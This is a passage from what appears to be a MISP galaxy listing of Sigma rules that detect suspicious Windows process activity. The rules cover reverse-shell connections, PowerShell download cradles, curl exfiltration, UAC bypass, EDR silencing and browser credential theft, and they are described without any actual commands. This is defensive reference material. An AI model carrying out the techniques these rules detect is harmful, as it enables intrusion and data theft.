author Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community
creation_date 2020/10/13
falsepositive ['Unknown']
filename proc_creation_win_susp_elavated_msi_spawned_shell.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1548.002']

Potentially Over Permissive Permissions Granted Using Dsacls.EXE

Detects usage of Dsacls to grant overly permissive permissions.

Internal MISP references

UUID 01c42d3c-242d-4655-85b2-34f1739632f7 which can be used as unique global reference for Potentially Over Permissive Permissions Granted Using Dsacls.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/20
falsepositive ['Legitimate administrators granting over permissive permissions to users']
filename proc_creation_win_dsacls_abuse_permissions.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

Shadow Copies Creation Using Operating Systems Utilities

Shadow copy creation using operating system utilities, possibly for credential access.

Internal MISP references

UUID b17ea6f7-6e90-447e-a799-e6c0a493d6ce which can be used as unique global reference for Shadow Copies Creation Using Operating Systems Utilities in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
creation_date 2019/10/22
falsepositive ['Legitimate administrator working with shadow copies, access for backup purposes']
filename proc_creation_win_susp_shadow_copies_creation.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003', 'attack.t1003.002', 'attack.t1003.003']

Perl Inline Command Execution

Detects execution of perl using the "-e"/"-E" flags. This could be used as a way to launch a reverse shell or execute live Perl code.

Internal MISP references

UUID f426547a-e0f7-441a-b63e-854ac5bdf54d which can be used as unique global reference for Perl Inline Command Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/02
falsepositive ['Unknown']
filename proc_creation_win_perl_inline_command_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']

Suspicious Obfuscated PowerShell Code

Detects suspicious UTF-16 and Base64 encoded, often obfuscated PowerShell code as commonly seen in command lines.

Internal MISP references

UUID 8d01b53f-456f-48ee-90f6-bc28e67d4e35 which can be used as unique global reference for Suspicious Obfuscated PowerShell Code in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/07/11
falsepositive ['Unknown']
filename proc_creation_win_powershell_base64_encoded_obfusc.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Remote Access Tool - GoToAssist Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID b6d98a4f-cef0-4abf-bbf6-24132854a83d which can be used as unique global reference for Remote Access Tool - GoToAssist Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/13
falsepositive ['Legitimate use']
filename proc_creation_win_remote_access_tools_gotoopener.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']

Curl Web Request With Potential Custom User-Agent

Detects execution of "curl.exe" with a potentially custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accepts specific "User-Agent" strings.

Internal MISP references

UUID 85de1f22-d189-44e4-8239-dc276b45379b which can be used as unique global reference for Curl Web Request With Potential Custom User-Agent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/07/27
falsepositive ['Unknown']
filename proc_creation_win_curl_custom_user_agent.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious Execution of Shutdown

Use of the command line to shut down or reboot Windows.

Internal MISP references

UUID 34ebb878-1b15-4895-b352-ca2eeb99b274 which can be used as unique global reference for Suspicious Execution of Shutdown in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/01
falsepositive ['Unknown']
filename proc_creation_win_shutdown_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1529']

PUA - System Informer Execution

Detects the execution of System Informer, a task manager tool used to view and manipulate processes, kernel options and other low-level operations.

Internal MISP references

UUID 5722dff1-4bdd-4949-86ab-fbaf707e767a which can be used as unique global reference for PUA - System Informer Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2023/05/08
falsepositive ['System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly']
filename proc_creation_win_pua_system_informer.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.discovery', 'attack.defense_evasion', 'attack.t1082', 'attack.t1564', 'attack.t1543']

Suspicious RunAs-Like Flag Combination

Detects suspicious command line flags that let the user set a target user and command, as seen e.g. in PsExec-like tools.

Internal MISP references

UUID 50d66fb0-03f8-4da0-8add-84e77d12a020 which can be used as unique global reference for Suspicious RunAs-Like Flag Combination in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/11/11
falsepositive ['Unknown']
filename proc_creation_win_susp_privilege_escalation_cli_patterns.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation']

HackTool - EDRSilencer Execution

Detects the execution of EDRSilencer, a tool that leverages the Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server, based on PE metadata information.

Internal MISP references

UUID eb2d07d4-49cb-4523-801a-da002df36602 which can be used as unique global reference for HackTool - EDRSilencer Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @gott_cyber
creation_date 2024/01/02
falsepositive ['Unlikely']
filename proc_creation_win_hktl_edrsilencer.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562']

PowerShell Web Download

Detects suspicious ways to download files or content using PowerShell.

Internal MISP references

UUID 6e897651-f157-4d8f-aaeb-df8151488385 which can be used as unique global reference for PowerShell Web Download in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/24
falsepositive ['Scripts or tools that download files']
filename proc_creation_win_powershell_download_cradles.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.execution', 'attack.t1059.001', 'attack.t1105']

PUA - AdvancedRun Suspicious Execution

Detects the execution of the AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts.

Internal MISP references

UUID fa00b701-44c6-4679-994d-5a18afa8a707 which can be used as unique global reference for PUA - AdvancedRun Suspicious Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/20
falsepositive ['Unknown']
filename proc_creation_win_pua_advancedrun_priv_user.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1134.002']
Related clusters

To see the related clusters, click here.

HackTool - TruffleSnout Execution

Detects the use of TruffleSnout.exe, an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low-noise enumeration.

Internal MISP references

UUID 69ca006d-b9a9-47f5-80ff-ecd4d25d481a which can be used as unique global reference for HackTool - TruffleSnout Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/20
falsepositive ['Unknown']
filename proc_creation_win_hktl_trufflesnout.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1482']
Related clusters

To see the related clusters, click here.

Suspicious Use of PsLogList

Detects usage of the PsLogList utility to dump event logs in order to extract admin accounts and perform account discovery, or to delete event logs.

Internal MISP references

UUID aae1243f-d8af-40d8-ab20-33fc6d0c55bc which can be used as unique global reference for Suspicious Use of PsLogList in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/12/18
falsepositive ['Another tool that uses the command line switches of PsLogList', 'Legitimate use of PsLogList by an administrator']
filename proc_creation_win_sysinternals_psloglist.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1087', 'attack.t1087.001', 'attack.t1087.002']
Related clusters

To see the related clusters, click here.

Potential Dropper Script Execution Via WScript/CScript

Detects wscript/cscript executions of scripts located in user directories

Internal MISP references

UUID cea72823-df4d-4567-950c-0b579eaf0846 which can be used as unique global reference for Potential Dropper Script Execution Via WScript/CScript in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019/01/16
falsepositive ['Some installers might generate a similar behavior. An initial baseline is required']
filename proc_creation_win_wscript_cscript_dropper.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.005', 'attack.t1059.007']
Related clusters

To see the related clusters, click here.

New Service Creation Using Sc.EXE

Detects the creation of a new service using the "sc.exe" utility.

Internal MISP references

UUID 85ff530b-261d-48c6-a441-facaa2e81e48 which can be used as unique global reference for New Service Creation Using Sc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
creation_date 2023/02/20
falsepositive ['Legitimate administrator or user creates a service for legitimate reasons.', 'Software installation']
filename proc_creation_win_sc_create_service.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Non Interactive PowerShell Process Spawned

Detects non-interactive PowerShell activity by looking at the "powershell" process whose parent is not a user GUI process such as "explorer.exe".

Internal MISP references

UUID f4bbd493-b796-416e-bbf2-121235348529 which can be used as unique global reference for Non Interactive PowerShell Process Spawned in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
creation_date 2019/09/12
falsepositive ['Likely. Many admin scripts and tools leverage PowerShell in their BAT or VB scripts which may trigger this rule often. It is best to add additional filters or use this to hunt for anomalies']
filename proc_creation_win_powershell_non_interactive_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Execute Files with Msdeploy.exe

Detects file execution using the msdeploy.exe lolbin

Internal MISP references

UUID 646bc99f-6682-4b47-a73a-17b1b64c9d34 which can be used as unique global reference for Execute Files with Msdeploy.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Beyu Denis, oscd.community
creation_date 2020/10/18
falsepositive ['System administrator Usage']
filename proc_creation_win_lolbin_msdeploy.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

UAC Bypass Using PkgMgr and DISM

Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)

Internal MISP references

UUID a743ceba-c771-4d75-97eb-8a90f7f4844c which can be used as unique global reference for UAC Bypass Using PkgMgr and DISM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/23
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_pkgmgr_dism.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Lolbin Runexehelper Use As Proxy

Detects usage of the "runexehelper.exe" binary as a proxy to launch other programs.

Internal MISP references

UUID cd71385d-fd9b-4691-9b98-2b1f7e508714 which can be used as unique global reference for Lolbin Runexehelper Use As Proxy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/29
falsepositive ['Unknown']
filename proc_creation_win_lolbin_runexehelper.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Dism Remove Online Package

Detects package removal from an online Windows image via the Deployment Image Servicing and Management (DISM) tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.

Internal MISP references

UUID 43e32da2-fdd0-4156-90de-50dfd62636f9 which can be used as unique global reference for Dism Remove Online Package in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/16
falsepositive ['Legitimate script']
filename proc_creation_win_dsim_remove.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Suspicious File Download From File Sharing Domain Via Wget.EXE

Detects potentially suspicious file downloads from file sharing domains using wget.exe

Internal MISP references

UUID a0d7e4d2-bede-4141-8896-bc6e237e977c which can be used as unique global reference for Suspicious File Download From File Sharing Domain Via Wget.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/05
falsepositive ['Unknown']
filename proc_creation_win_wget_download_susp_file_sharing_domains.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious Response File Execution Via Odbcconf.EXE

Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension.

Internal MISP references

UUID 2d32dd6f-3196-4093-b9eb-1ad8ab088ca5 which can be used as unique global reference for Suspicious Response File Execution Via Odbcconf.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/22
falsepositive ['Unlikely']
filename proc_creation_win_odbcconf_response_file_susp.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.008']
Related clusters

To see the related clusters, click here.

Potential Windows Defender Tampering Via Wmic.EXE

Detects potential tampering with Windows Defender settings, such as adding exclusions, using wmic.

Internal MISP references

UUID 51cbac1e-eee3-4a90-b1b7-358efb81fa0a which can be used as unique global reference for Potential Windows Defender Tampering Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/11
falsepositive ['Unknown']
filename proc_creation_win_wmic_namespace_defender.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1546.008']
Related clusters

To see the related clusters, click here.

Hiding Files with Attrib.exe

Detects usage of attrib.exe to hide files from users.

Internal MISP references

UUID 4281cb20-2994-4580-aa63-c8b86d019934 which can be used as unique global reference for Hiding Files with Attrib.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sami Ruohonen
creation_date 2019/01/16
falsepositive ['IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)', 'Msiexec.exe hiding desktop.ini']
filename proc_creation_win_attrib_hiding_files.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.001']
Related clusters

To see the related clusters, click here.

Suspicious Reg Add BitLocker

Detects suspicious addition to BitLocker related registry keys via the reg.exe utility

Internal MISP references

UUID 0e0255bf-2548-47b8-9582-c0955c9283f5 which can be used as unique global reference for Suspicious Reg Add BitLocker in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/11/15
falsepositive ['Unlikely']
filename proc_creation_win_reg_bitlocker.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1486']
Related clusters

To see the related clusters, click here.

Uncommon Child Process Of Appvlp.EXE

Detects uncommon child processes of Appvlp.EXE. Appvlp, or the Application Virtualization Utility, is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands. Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder or to mark a file as a system file.

Internal MISP references

UUID 9c7e131a-0f2c-4ae0-9d43-b04f4e266d43 which can be used as unique global reference for Uncommon Child Process Of Appvlp.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman
creation_date 2020/03/13
falsepositive ['Unknown']
filename proc_creation_win_appvlp_uncommon_child_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.t1218', 'attack.defense_evasion', 'attack.execution']
Related clusters

To see the related clusters, click here.

Potential Defense Evasion Via Right-to-Left Override

Detects the presence of the "U+202E" (Right-to-Left Override) character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. This is used as an obfuscation and masquerading technique.

Internal MISP references

UUID ad691d92-15f2-4181-9aa4-723c74f9ddc3 which can be used as unique global reference for Potential Defense Evasion Via Right-to-Left Override in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Micah Babinski, @micahbabinski
creation_date 2023/02/15
falsepositive ['Commandlines that contains scriptures such as arabic or hebrew might make use of this character']
filename proc_creation_win_susp_right_to_left_override.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.002']
Related clusters

To see the related clusters, click here.

Windows Processes Suspicious Parent Directory

Detects suspicious parent processes of well-known Windows processes.

Internal MISP references

UUID 96036718-71cc-4027-a538-d1587e0006a7 which can be used as unique global reference for Windows Processes Suspicious Parent Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author vburov
creation_date 2019/02/23
falsepositive ['Some security products seem to spawn these']
filename proc_creation_win_susp_proc_wrong_parent.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.003', 'attack.t1036.005']
Related clusters

To see the related clusters, click here.

File In Suspicious Location Encoded To Base64 Via Certutil.EXE

Detects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations

Internal MISP references

UUID 82a6714f-4899-4f16-9c1e-9a333544d4c3 which can be used as unique global reference for File In Suspicious Location Encoded To Base64 Via Certutil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/15
falsepositive ['Unknown']
filename proc_creation_win_certutil_encode_susp_location.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Suspicious Redirection to Local Admin Share

Detects a suspicious output redirection to the local admin share. This technique is often found in malicious scripts or hacktool stagers.

Internal MISP references

UUID ab9e3b40-0c85-4ba1-aede-455d226fd124 which can be used as unique global reference for Suspicious Redirection to Local Admin Share in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/16
falsepositive ['Unknown']
filename proc_creation_win_susp_redirect_local_admin_share.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration', 'attack.t1048']
Related clusters

To see the related clusters, click here.

Renamed Mavinject.EXE Execution

Detects the execution of a renamed version of the "Mavinject" process, which can be abused to perform process injection using the "/INJECTRUNNING" flag.

Internal MISP references

UUID e6474a1b-5390-49cd-ab41-8d88655f7394 which can be used as unique global reference for Renamed Mavinject.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth
creation_date 2022/12/05
falsepositive ['Unlikely']
filename proc_creation_win_renamed_mavinject.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055.001', 'attack.t1218.013']
Related clusters

To see the related clusters, click here.

Potential Powershell ReverseShell Connection

Detects usage of the "TcpClient" class, which can be abused to establish remote connections and reverse shells, as seen in the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and others.

Internal MISP references

UUID edc2f8ae-2412-4dfd-b9d5-0c57727e70be which can be used as unique global reference for Potential Powershell ReverseShell Connection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/03/03
falsepositive ['In rare administrative cases, this function might be used to check network connectivity']
filename proc_creation_win_powershell_reverse_shell_connection.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

New Remote Desktop Connection Initiated Via Mstsc.EXE

Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server. Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.

Internal MISP references

UUID 954f0af7-62dd-418f-b3df-a84bc2c7a774 which can be used as unique global reference for New Remote Desktop Connection Initiated Via Mstsc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/07
falsepositive ['WSL (Windows Sub System For Linux)']
filename proc_creation_win_mstsc_remote_connection.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.001']
Related clusters

To see the related clusters, click here.

Remote Access Tool - ScreenConnect Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID 57bff678-25d1-4d6c-8211-8ca106d12053 which can be used as unique global reference for Remote Access Tool - ScreenConnect Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/13
falsepositive ['Legitimate usage of the tool']
filename proc_creation_win_remote_access_tools_screenconnect.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Suspicious Vsls-Agent Command With AgentExtensionPath Load

Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter

Internal MISP references

UUID 43103702-5886-11ed-9b6a-0242ac120002 which can be used as unique global reference for Suspicious Vsls-Agent Command With AgentExtensionPath Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author bohops
creation_date 2022/10/30
falsepositive ['False positives depend on custom use of vsls-agent.exe']
filename proc_creation_win_vslsagent_agentextensionpath_load.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Cmd.EXE Missing Space Characters Execution Anomaly

Detects Windows command lines that miss a space before or after the /c flag when running a command using cmd.exe. This could be a sign of obfuscation or of a fat-finger problem (typo by the developer).

Internal MISP references

UUID a16980c2-0c56-4de0-9a79-17971979efdd which can be used as unique global reference for Cmd.EXE Missing Space Characters Execution Anomaly in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/08/23
falsepositive ['Unknown']
filename proc_creation_win_cmd_no_space_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious MSDT Parent Process

Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation

Internal MISP references

UUID 7a74da6b-ea76-47db-92cc-874ad90df734 which can be used as unique global reference for Suspicious MSDT Parent Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nextron Systems
creation_date 2022/06/01
falsepositive ['Unknown']
filename proc_creation_win_msdt_susp_parent.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Potential PowerShell Command Line Obfuscation

Detects the PowerShell command lines with special characters

Internal MISP references

UUID d7bcd677-645d-4691-a8d4-7a5602b780d1 which can be used as unique global reference for Potential PowerShell Command Line Obfuscation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)
creation_date 2020/10/15
falsepositive ['Amazon SSM Document Worker', 'Windows Defender ATP']
filename proc_creation_win_powershell_cmdline_special_characters.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1027', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Potential Unquoted Service Path Reconnaissance Via Wmic.EXE

Detects a known WMI recon method to look for unquoted service paths using wmic. Often used by pentesters' and attackers' enumeration scripts.

Internal MISP references

UUID 68bcd73b-37ef-49cb-95fc-edc809730be6 which can be used as unique global reference for Potential Unquoted Service Path Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/20
falsepositive ['Unknown']
filename proc_creation_win_wmic_recon_unquoted_service_search.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

Suspicious Desktopimgdownldr Command

Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet

Internal MISP references

UUID bb58aa4a-b80b-415a-a2c0-2f65a4c81009 which can be used as unique global reference for Suspicious Desktopimgdownldr Command in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/07/03
falsepositive ['False positives depend on scripts and administrative tools used in the monitored environment']
filename proc_creation_win_desktopimgdownldr_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

HackTool - Certipy Execution

Detects Certipy, a tool for Active Directory Certificate Services enumeration and abuse, based on PE metadata characteristics and common command-line arguments.

Internal MISP references

UUID 6938366d-8954-4ddc-baff-c830b3ba8fcd which can be used as unique global reference for HackTool - Certipy Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2023/04/17
falsepositive ['Unlikely']
filename proc_creation_win_hktl_certipy.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.credential_access', 'attack.t1649']
Related clusters

To see the related clusters, click here.

Potential Commandline Obfuscation Using Escape Characters

Detects potential commandline obfuscation using known escape characters

Internal MISP references

UUID f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd which can be used as unique global reference for Potential Commandline Obfuscation Using Escape Characters in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author juju4
creation_date 2018/12/11
falsepositive ['Unknown']
filename proc_creation_win_susp_cli_obfuscation_escape_char.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1140']
Related clusters

To see the related clusters, click here.

PowerShell DownloadFile

Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line

Internal MISP references

UUID 8f70ac5f-1f6f-4f8e-b454-db19561216c5 which can be used as unique global reference for PowerShell DownloadFile in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/08/28
falsepositive ['Unknown']
filename proc_creation_win_powershell_susp_ps_downloadfile.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.command_and_control', 'attack.t1104', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Unusual Child Process of dns.exe

Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)

Internal MISP references

UUID a4e3d776-f12e-42c2-8510-9e6ed1f43ec3 which can be used as unique global reference for Unusual Child Process of dns.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Elastic (idea)
creation_date 2022/09/27
falsepositive ['Unknown']
filename proc_creation_win_dns_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.initial_access', 'attack.t1133']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation CLIP+ Launcher

Detects obfuscated use of Clip.exe to execute PowerShell.

Internal MISP references

UUID b222df08-0e07-11eb-adc1-0242ac120002 which can be used as unique global reference for Invoke-Obfuscation CLIP+ Launcher in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/13
falsepositive ['Unknown']
filename proc_creation_win_hktl_invoke_obfuscation_clip.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Potential Password Spraying Attempt Using Dsacls.EXE

Detects possible password spraying attempts using Dsacls

Internal MISP references

UUID bac9fb54-2da7-44e9-988f-11e9a5edbc0c which can be used as unique global reference for Potential Password Spraying Attempt Using Dsacls.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/20
falsepositive ['Legitimate use of dsacls to bind to an LDAP session']
filename proc_creation_win_dsacls_password_spray.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

SQLite Chromium Profile Data DB Access

Detects usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing.

Internal MISP references

